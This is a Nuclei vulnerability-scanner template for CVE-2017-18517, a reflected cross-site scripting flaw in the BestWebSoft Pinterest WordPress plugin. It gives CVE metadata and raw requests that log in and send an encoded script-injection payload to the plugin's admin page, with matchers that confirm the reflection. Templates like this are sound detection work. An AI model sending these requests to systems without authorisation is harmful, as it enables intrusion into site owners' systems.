nuclei-templates/http/cves/2017/CVE-2017-18517.yaml

55 lines
2.0 KiB
YAML

id: CVE-2017-18517
info:
name: Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues.
remediation: Fixed in version 1.0.5
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18517
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18517
- https://wordpress.org/plugins/bws-pinterest/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18517
cwe-id: CWE-79
epss-score: 0.00088
epss-percentile: 0.36836
cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: bestwebsoft
product: pinterest
framework: wordpress
publicwww-query: /wp-content/plugins/bws-pinterest/
tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "Pinterest by BestWebSoft")'
condition: and
# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950